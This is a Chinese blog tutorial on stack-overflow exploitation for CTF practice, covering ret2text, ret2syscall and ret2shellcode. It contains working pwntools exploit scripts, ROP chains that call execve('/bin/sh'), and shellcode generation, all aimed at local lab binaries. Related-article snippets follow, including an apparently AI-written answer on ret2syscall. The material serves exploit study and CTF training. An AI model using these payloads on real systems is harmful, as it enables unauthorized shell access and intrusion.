ret2text、ret2syscall、ret2shellcode 详解

于 2025-02-11 20:49:30 发布
阅读量845 收藏 20
点赞数 21
文章标签: 开发语言 安全 学习 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/a12sj_/article/details/145579143
版权

一、ret2text(Return to .text)

原理

利用程序 .text 段(代码段)中已有的代码片段(如 system("/bin/sh"))直接控制程序流。

适用条件

存在栈溢出漏洞。

程序中存在可直接利用的代码片段(如 system("/bin/sh"))。

攻击步骤

  1. 确定偏移量:计算输入缓冲区的起始位置到返回地址的偏移量。

  2. 定位目标地址:找到程序中 system("/bin/sh") 的地址。

  3. 构造 Payload:覆盖返回地址为目标地址。

示例(32位程序)

假设程序中有以下代码片段:

void vuln() {
    char buf[20];
    gets(buf); // 栈溢出漏洞
}

void win() {
    system("/bin/sh"); // 目标函数
}
Payload 构造:
from pwn import *

p = process('./ret2text')
offset = 28            # 偏移量(通过调试确定)
win_addr = 0x08048456  # win() 函数地址(通过 objdump 或 gdb 获取)

payload = b'A' * offset + p32(win_addr)
p.sendline(payload)
p.interactive()

二、ret2syscall(Return to Syscall)

原理

通过 ROP(Return-Oriented Programming)链构造系统调用(如 execve("/bin/sh", 0, 0)),利用 int 0x80(32位)或 syscall(64位)触发。

适用条件

存在栈溢出漏洞。

程序中存在足够的 ROP Gadgets。

攻击步骤(32位)

  1. 确定偏移量:同 ret2text。

  2. 设置寄存器

    eax = 0xbexecve 的系统调用号)。

    ebx = "/bin/sh" 的地址

    ecx = 0(参数数组地址)。

    edx = 0(环境变量地址)。

  3. 触发系统调用:调用 int 0x80

示例(32位)

查找 Gadgets:
ROPgadget --binary ./ret2syscall --only "pop|ret" | grep "eax"
ROPgadget --binary ./ret2syscall --only "pop|ret" | grep "ebx"

假设找到以下 Gadgets:

0x080bb196 : pop eax ; ret
0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret
0x08049421 : int 0x80
Payload 构造:
from pwn import *

p = process('./ret2syscall')
offset = 44
binsh_addr = 0x080be408  # 程序中 "/bin/sh" 字符串地址

payload = b'A' * offset
payload += p32(0x080bb196)  # pop eax ; ret
payload += p32(0xb)         # eax = 0xb
payload += p32(0x0806eb90)  # pop edx ; pop ecx ; pop ebx ; ret
payload += p32(0)           # edx = 0
payload += p32(0)           # ecx = 0
payload += p32(binsh_addr)  # ebx = "/bin/sh" 地址
payload += p32(0x08049421)  # int 0x80

p.sendline(payload)
p.interactive()

三、ret2shellcode(Return to Shellcode)

原理

向可执行内存区域(如栈)写入 Shellcode,并跳转执行。

适用条件

存在栈溢出漏洞。

内存区域有 可写且可执行 权限(或关闭 NX 保护)。

攻击步骤

  1. 确定偏移量:同 ret2text。

  2. 写入 Shellcode:将 Shellcode 放在输入缓冲区的起始位置。

  3. 覆盖返回地址:指向 Shellcode 的起始地址。

示例(32位)

生成 Shellcode:
shellcode = asm(shellcraft.sh())  # 使用 pwntools 生成
Payload 构造:
from pwn import *

p = process('./ret2shellcode')
offset = 28
buf_addr = 0xffffd000  # 缓冲区地址(通过调试确定)

payload = shellcode.ljust(offset, b'A') + p32(buf_addr)
p.sendline(payload)
p.interactive()

四、关键注意事项

  1. 偏移量计算

            使用 cyclic(100) 生成测试字符串,通过崩溃时的 eip 值计算偏移。

  2. 地址打包

            32位:p32(address),64位:p64(address)

  3. 内存保护

    NX 保护:若开启,ret2shellcode 不可用。

    ASLR:若开启,需结合信息泄露绕过。

  4. 调试工具

    • GDB + Peda/Pwndbg/EFI。

    • checksec 检查程序保护机制。

五、总结

攻击类型核心思路依赖条件
ret2text跳转到程序已有的代码片段存在可利用函数
ret2syscall构造 ROP 链触发系统调用足够的 Gadgets
ret2shellcode向可执行内存写入并执行 Shellcode内存可写且可执行(NX关闭)

根据题目环境和保护机制选择合适的方法,结合调试工具动态验证。

时光匆匆,一篇博客又到了结尾处啦。真心感谢每一位愿意花时间阅读我文字的朋友,希望你们每天都过得开开心心的,生活顺顺利利哦,咱们下次再通过文字‘相遇’呀。

bae-唯一
关注
pwn ret2syscall
young‘s blog
02-11 1029
学了学pwndbg的使用,文章在这里:gdb+pwndbg食用指南 这篇博客注定是一篇水文,因为昨天做了做XCTF攻防世界上的题目,基础题都做不来,那题应该是ret2text的内容,还是太菜,没有深刻理解原理,导致做不出,对于ret2syscall现在理解的不深刻,在这里记录一下是怎么做的吧,原理懂了再补上。 查看一下文件的基本信息 32位静态链接的程序,开启了NX保护。 由于是静态链接的,所以我...
pwn小白入门03---ret2text
weixin_45943522的博客
02-21 6768
什么是栈溢出: 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(比如gets函数,他不会去验证你输入的值的长度,通过这个函数,你可以往一个本身大小为4字节的数组中填入任意大小的数据,如果填入8字节的数据,将会导致栈溢出,进而程序报错)。就像是往杯子里倒水,水满了溢出来最后烫到你一样。 最简单的栈溢出利用:ret2text 通过栈溢出修改call指令保存在栈上的返回地址(eip的值),这样cpu执行ret指令的时候,就会将被修改的值从栈上取
基础ROP之:ret2textret2libc,ret2syscallret2shellcode
WdIg-2023的博客
01-30 1744
在上一篇文章中学习了gdb和pwntools的基本使用后,这篇文章来带领大家入门pwn,包括:ret2textret2libc,ret2syscallret2shellcode
浅谈 ret2text
akdelt的博客
01-21 1486
而此时栈顶指针指向 ‘/bin/sh’ 的地址,于是 ‘/bin/sh’ 被放入 rdi 中,然后执行 ret,此时后门函数地址顶上来了,于是就 ret 到了 func 的地址 (这就是为什么找的是pop rdi;我瞎猜的,不然不好解释)而拿去参数也是同过 EBP 偏移量来实现的,本来有返回地址时通过 [EBP+8] 来拿参数一,但是因为没有返回地址 此时 EBP 和 参数相邻相差 4 个字节,所以 EBP + 8 就不是参数一的地址了。前六个参数依次存放于rdi,rsi,rdx,rcx,r8,r9中。
ret2text
m0_62280492的博客
07-11 1203
x86和x64下常见的ret2text
ret2syscall
shi789789789的博客
05-26 669
博客网址:点击这里 微信:18223081347 欢迎加群聊天 :452380935 这一次我们来深入分析下更难的栈溢出题目ret2syscall 首先还是先检查下的保护 [*] '/home/pwn/桌面/题目/ROP/ret2syscall' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No .
从零开始学逆向:理解ret2syscall
weixin_44626085的博客
02-19 1390
链接:https://pan.baidu.com/s/19ymHlZZmVGsJHFmmlwww0w 提取码:r4el 首先checksec 看一下保护机制ret2syscall 即控制程序执行系统调用来获取 shell 什么是系统调用?​ 3.1 使用ida打开分析 ​gets函数存在明显的栈溢出,但是这次没有后门函数,NX防护也打开了,那么就要换一种套路了,通过系统调用拿到shell 我们需要控制eax,ebx,ecx,edx的值,可以使用ROPgadget这个工具帮我们找到所需的代码片段。
PWN基础13:Ret2Syscall 突破 NX保护
prettyX的博客
07-15 836
问题背景 ret2text漏洞利用,是依赖于程序中存在system("/bin/sh")的函数,如果在程序本身中没有调用这个函数,那怎么办呢? 我们的解决办法是使用ret2shellcode,自定义shellcode代码,但是这种方法的局限性是需要程序没有开启NX保护,那如果程序开了NX保护呢,又该如何呢? 让我们一起来学习Ret2Syscall 基础知识 1、Gadgets:是指在程序中的指令片段,有时为了达到执行命令的目的,需要多个Gadget来完成我们的功能。Gadget最后一般都有ret指
PWN基础10:Ret2Shellcode 32位实例
prettyX的博客
07-14 1153
0x01 Ret2Text的局限性
ROPgadget题型——ret2syscall
qq_41560595的博客
10-09 712
解题思路 这道题本来考虑使用libc来解,但发现不是动态链接形成的文件。 于是,考虑如下系统调用获取shell: execve("/bin/sh",NULL,NULL) 在32位程序中,参数一般是放在栈中的,但系统调用例外,参数是放在通用寄存器中的。即eax,ebx,ecx,edx。 eax:存放系统调用号,0xb ebx:存放第一个参数/bin/sh地址 ecx:存放第二个参数0 edx:存放第三个参数0 下面就是想办法把几个参数和调用号“弹到”寄存器上: 找到pop edx;pop ecx;pop e
pwn笔记 - ret2text - 函数传参(x86&x64)
weixin_44227244的博客
09-06 4554
pwn笔记 - ret2text - 函数传参
ROP初探之ret2text
chlet的博客
05-05 645
ROP即返回导向编程是一种计算机安全利用技术,它允许攻击者在存在诸如可执行空间保护和代码签名等安全防御的情况下执行代码。在这种技术中,攻击者通过控制调用栈来劫持程序控制流,并执行机器内存中已存在的精心选择的机器指令序列,称为“gadgets”。每个gadgets通常以返回指令结束,并位于现有程序和/或共享库代码中的子程序内。这些gadgets串联在一起,允许攻击者在使用阻止更简单攻击的防御的机器上执行任意操作。
二进制漏洞挖掘之ret2text栈溢出
brucexia的专栏
01-31 798
(2)执行“gcc -m32 -fno-stack-protector ret2text.c -o ret2text”命令,编译程序,再使用gdb调试程序,使程序运行到read函数,执行“cyclic 200”命令,生成200个字符。执行“python ret2text.py”命令,运行脚本,获取系统shell,再执行“ls”命令,测试shell能否正常使用,结果如图11-32所示。由图可知,ebp地址存储的字符为“eaaa”,执行“cyclic -l eaaa”,结果如图11-30所示。
栈溢出实例--笔记一(ret2text
一只青木呀
08-01 2039
栈溢出实例1、什么是栈溢出?2、栈结构3、栈溢出需要解决的问题3.1、解决如何跳转的问题3.2、跳转到哪里去?4、实战 1、什么是栈溢出? 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致栈中与其相邻的变量的值被改变。 2、栈结构 3、栈溢出需要解决的问题 在我们知道什么是栈溢出以及了解了栈的结构之后,我们就可以开始通过栈溢出破坏栈结构。 在破坏栈结构的时候,我们需要注意两个问题: 1、如何跳转? 2、跳转到哪里去? 3.1、解决如何跳转的问题 在上面栈结构的图中
pwn学习笔记(2)ret_2_text_or_shellcode
qq_66013948的博客
02-04 1769
​ ax寄存器:通用寄存器,可用于存放多种数据​ bp寄存器:存放的是栈帧的栈底地址​ sp寄存器:存放的是栈顶的地址​ 栈帧是存储函数的一些信息的地方,栈帧存储有函数的局部变量,传递给子函数的实际参数,父函数的地址以及上一个栈帧栈底的地址,大致情况如下:​ 在函数调用的过程中,首先会讲bp寄存器的值进行压栈,以方便在恢复的时候恢复栈底寄存器的值,再之后,会按顺序将局部变量压栈,最后是子函数的实际参数,会按照先入栈的后出栈,从最后一个实际参数先入栈再到第一个实际参数,比如函数a(int a ,
[二进制安全学习]ret2text
Y4tacker的博客
07-12 1372
文章目录写在前面前置小知识bss段data段text段heapstackret2text参考链接 写在前面 已经学了一小段时间二进制了,以后慢慢确定一个深入的方向吧,开冲 前置小知识 bss段 bss段(bss segment)通常是指用来存放程序中未初始化的全局变量的一块内存区域。 bss是英文Block Started by Symbol的简称。 bss段属于静态内存分配。 比如 int a; data段 数据段(data segment)通常是指用来存放程序中已初始化的全局变量的一块内存区域。 数据
[PWN][进阶篇]Rop-Ret2Text介绍及实例教学
网络安全知识分享
03-22 6514
Rop-Ret2Text介绍及实例教学1、前提知识2、实例教学 1、前提知识 什么是Rop系统攻击 是一种新型的基于代码复用技术的攻击,攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。 ROP也有其不同于正常程序的内在特征: (1)ROP控制流中,call和ret指令不操纵函数,而是用于将函数里面的短指令序列的执行流串起来,但在正常的程序中,call和ret分别代表函数的开始和结束; (2)ROP控制流中,jmp指令在不同的库函数甚至不同的库之间跳转,攻击者抽取的指令序列可能取自任意一个二进制文件
PWN入门(三)——ret2text /ret2syscall /ret2shellcode
Jack_Grealish的博客
11-10 1178
根据目录看文章结构,优快云中没有Typora那么多级标题,所以有点乱。
ret2syscall系统调用
最新发布
03-24
<think>好的,我现在需要帮助用户了解ret2syscall技术及其在系统调用中的应用,特别是其原理和实现方式。首先,我得回忆一下自己对这个主题的了解,并整理相关资料。根据用户提供的引用内容,我需要结合这些信息来构建一个清晰准确的回答。 首先,ret2syscall是一种ROP(Return-Oriented Programming)攻击技术,利用程序中已有的代码片段(gadgets)来执行系统调用。系统调用是用户态程序请求内核服务的方式,比如在Linux中,x86架构使用int 0x80指令,而amd64使用syscall指令。这一点在引用[1]和[2]中都有提到。 接下来,我需要解释ret2syscall的基本原理。通常,攻击者通过溢出覆盖返回地址,控制程序执行流,将多个gadgets串联起来,设置系统调用所需的参数,然后触发系统调用。例如,执行execve("/bin/sh",0,0)来获取shell。引用[3]提到了需要找到/bin/sh字符串的地址,这也是构造payload的一部分。 然后,实现步骤需要详细说明。包括如何寻找gadgets,如何设置寄存器(eax存放系统调用号,ebx、ecx、edx等存放参数),以及如何触发int 0x80或syscall指令。这部分需要结合引用中的例子,比如如何通过ROPgadget工具找到所需的指令片段和字符串地址。 可能遇到的问题包括如何确保寄存器的正确设置,以及不同架构下的指令差异。例如,x86和amd64的系统调用指令和寄存器使用可能不同,需要特别指出。此外,堆栈平衡和地址对齐的问题也需要考虑,避免程序崩溃。 最后,生成相关问题时要围绕技术原理、工具使用、防御措施和应用场景展开,确保问题覆盖用户可能感兴趣的各个方面。需要检查引用内容是否准确,并正确标注来源,比如int 0x80和syscall的区别来自引用[1]和[2],/bin/sh字符串的查找方法来自引用[3]。 总结下来,回答需要结构清晰,逐步解释ret2syscall的原理、实现步骤、关键点,并引用提供的资料来支持每个部分的内容。同时,确保语言准确,符合用户的要求,使用中文,并正确应用LaTeX格式。</think>### ret2syscall 技术解析 #### 1. 技术原理 ret2syscall 是一种基于 **ROP(Return-Oriented Programming)** 的攻击技术,通过控制程序执行流,组合代码片段(gadgets)触发系统调用。其核心在于利用程序中已有的指令片段,按特定顺序执行,最终调用如 `execve("/bin/sh")` 等系统函数获取控制权。 系统调用原理: - **x86架构** 使用 `int 0x80` 指令触发系统调用,系统调用号存入 `eax`,参数依次存入 `ebx`、`ecx`、`edx` 等寄存器[^1]。 - **amd64架构** 使用 `syscall` 指令,调用号存入 `rax`,参数使用 `rdi`、`rsi`、`rdx` 等寄存器[^2]。 #### 2. 实现步骤 1. **寻找gadgets** 通过工具(如 `ROPgadget`)搜索以下指令片段: - 控制寄存器的指令(如 `pop eax; ret`)。 - 数据传递指令(如 `mov [ebx], ecx; ret`)。 - 系统调用触发指令(`int 0x80` 或 `syscall`)[^2]。 2. **构造参数链** 以执行 `execve("/bin/sh", 0, 0)` 为例: - **系统调用号**:`execve` 在 x86 中为 `0x0b`(`eax=11`)。 - **参数设置**:`ebx` 指向 `/bin/sh` 字符串地址,`ecx` 和 `edx` 设为 `0`[^3]。 3. **构建Payload** 示例 payload 结构(x86): ```plaintext [填充数据] + [pop eax; ret地址] + [0x0b] + [pop ebx; ret地址] + [/bin/sh地址] + [int 0x80地址] ``` #### 3. 关键点 - **字符串地址获取**:需定位 `/bin/sh` 在内存中的地址,可通过工具搜索或动态泄漏。 - **架构差异**:x86 与 amd64 的寄存器及调用指令不同,需针对性构造。 - **堆栈平衡**:需确保 `ret` 指令链的堆栈操作正确,避免崩溃。 #### 4. 防御措施 - **地址随机化(ASLR)**:增加预测内存地址的难度。 - **栈保护(Stack Canary)**:检测栈溢出。 - **代码段不可执行(NX)**:阻止直接执行栈中的代码。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值